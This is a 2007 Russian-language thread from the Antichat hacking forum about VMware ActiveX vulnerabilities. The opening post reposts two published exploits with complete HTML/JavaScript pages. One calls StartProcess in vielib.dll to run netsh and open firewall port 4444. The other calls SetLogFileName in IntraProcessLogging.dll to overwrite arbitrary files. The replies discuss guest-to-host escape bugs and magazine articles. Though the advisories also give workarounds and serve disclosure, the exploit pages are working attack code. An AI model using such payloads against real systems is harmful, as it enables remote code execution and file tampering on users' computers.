Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

24.09.2007, 00:19
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме: 3242773
Репутация:
632
|
|
Уязвимости в VmWare
Виртуальные машины используются в качустве полигона для для иследования вредоносных программ, создания гостевой оси для хак опытов каждый для себя найдёт сам применения . Но так же как и другое ПО они не лешены ошибок в коде и поэтому и поэтому представляют собой соблазнительную идею для атак.
29 июля 2007 года хакер caLLAX из групы GOODFELLAS Security Research Team нашёл уязвимость в VmWare , он обнаружил что в состав VmWare входит любопытный ActiveX компонент, он реализован вдинамической библиотеке vielib.dll которая экспортирует потециально небезопасные методы.ОДним из таких методов является StartProcess позволяющий порождать процесы от имени текущего пользователя со всеми его привелегиями.
подробнее можно прочитать на :
http://www.securityfocus.com/bid/25118
сам эксплоит:
Код:
:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit
=============================================================================
Internal ID: VULWAR200707290.
-----------
Introduction
------------
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
Summary
-------
The StartProcess method doesn't check if it's being called from the application,
or malicious users. Remote Attacker could craft a html page and execute code in
a remote system with the actual user privileges.
Impact
------
Any computer that uses this Sofware will be exposed to Remote Execution Code.
Workaround
----------
- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
- Unregister vielib.dll using regsvr32.
Timeline
--------
July 29 2007 -- Bug Discovery.
July 29 2007 -- Exploit published.
Credits
-------
* callAX <callAX@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Details
-----------------
StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
is using three standard files that exists in every Microsoft Office 2003 Application.
<HTML>
<BODY>
<object id=ctrl classid="clsid:{7B9C5422-39AA-4C21-BEEF-645E42EB4529}"></object>
<SCRIPT>
function Poc() {
arg1 = "C:\\windows\\system32\\netsh.exe"
arg2 = "C:\\windows\\system32\\netsh.exe firewall add portopening tcp 4444 GotIT"
arg3 = "C:\\windows\\system32\\"
arg4 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseneu.txt"
arg5 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseeng.txt"
arg6 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseenu.txt"
arg7 = "1"
ctrl.StartProcess(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7)
}
</SCRIPT>
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
</BODY>
</HTML>
# milw0rm.com [2007-07-29]
http://milw0rm.com/exploits/4244
так же 30июля 2007 года (на следующий день)
этим же самым человеком была найдена ещё одна уязвимость в этой же библиотеке.
Так же 28 июля той же групой была найдена уязвимость в VmWare позволяющая произвести перезапись произвольного кода
Код:
<!--
---------------------------------------------------------------------------
:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
===========================================================================
Internal ID: VULWAR200707280.
-----------
Introduction
------------
IntraProcessLogging.dll is a library included in the Program Vmware from
Vmware Inc. Company.
Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
Summary
-------
The SetLogFileName method doesn't check if it's being called from the
application,
or malicious users. Remote Attacker could craft a html page and overwrite
arbitrary
files in a system.
Impact
------
Any computer that uses this Sofware will be exposed to Data Write Arbitrary.
Workaround
----------
- Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24
- Unregister IntraProcessLogging.dll using regsvr32.
Timeline
--------
July 28 2007 -- Bug Discovery.
July 28 2007 -- Exploit published.
Credits
-------
* callAX <callAX@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Details
-----------------
SetLogFileName method receives one argument filename in this format
"c:\path\file".
Proof of Concept
---------------->
<HTML>
<BODY>
<object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\\arbitrary_file.txt"
ctrl.SetLogFileName(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>
# milw0rm.com [2007-07-28]
http://milw0rm.com/exploits/4240
и так в связи популяризации виртуальных машин начинаются оттачиваться новые технологии нападения и обороны на онные.
навеяно журналом хакер за сентябрь (постараясь зделать скан статей с описанием данной уязвимости)
Так же при поиске на http://milw0rm.com/search.php уязвимостей по запросу VmWare было показанно 5 уязвимостей что уже заставляет задуматься.
2007-07-30 VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit 6925 R D X callAX
2007-07-29 VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit 5887 R D X callAX
2007-07-28 VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit 3726 R D X callAX
2006-08-27 VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit 5491 R D c0ntex
2006-08-16 VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit 3663 R D X nop
|
|
|

24.09.2007, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме: 2487541
Репутация:
761
|
|
Так уязвимость вроде как выполняется внутри vmware на которую поставлена винда, а не в самой реальной системе?..
И как тут же написано "создания гостевой оси для хак опытов". У меня на vmware рассадник троянов и вирусов, да и друзья заходят через radmin поприкалыватся. Так-что каких-то там уязвимостей внутри vmware бояться... Это странно 
Если конечно vmware не использовать для vps.
|
|
|
Ошибка имевшая место в 2005 году |

24.09.2007, 19:01
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме: 3242773
Репутация:
632
|
|
Ошибка имевшая место в 2005 году
А вот здесь ты не прав так как уязвимость в vmnat.ехе входящей в состав VMWare Workstation 5.5.0 приводила к тому что при вызывания переполнения динамической памяти возможна была засылка кода на основную ось со всеми вытикающими из этого последствиями.
более подробно можно почитать в архиве с сканом журнала
http://slil.ru/24894467
|
|
|

24.09.2007, 19:36
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
В Хакере каком-то писали, что есть там уязвимость какая-то, использование, которой, позволяет "выйти за границы вээмваре"(номера 55-70 примерно)
|
|
|

24.09.2007, 19:38
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
Сообщение от Dr.Check
В Хакере каком-то писали, что есть там уязвимость какая-то, использование, которой, позволяет "выйти за границы вээмваре"(номера 55-70 примерно)
статья Криса?
|
|
|

24.09.2007, 19:51
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме: 3242773
Репутация:
632
|
|
Последний раз редактировалось Liar; 24.09.2007 в 19:55..
|
|
|

24.09.2007, 19:58
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме: 4205500
Репутация:
930
|
|
Да Крис писал, 87 номер. Старая статья уже.
|
|
|

24.09.2007, 20:00
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
Сообщение от Fata1ex
Да Крис писал, 87 номер. Старая статья уже.
старая, но интересная)
|
|
|

24.09.2007, 20:02
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме: 4205500
Репутация:
930
|
|
В тот период было гораздо больше интересных статей чем сейчас=(
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|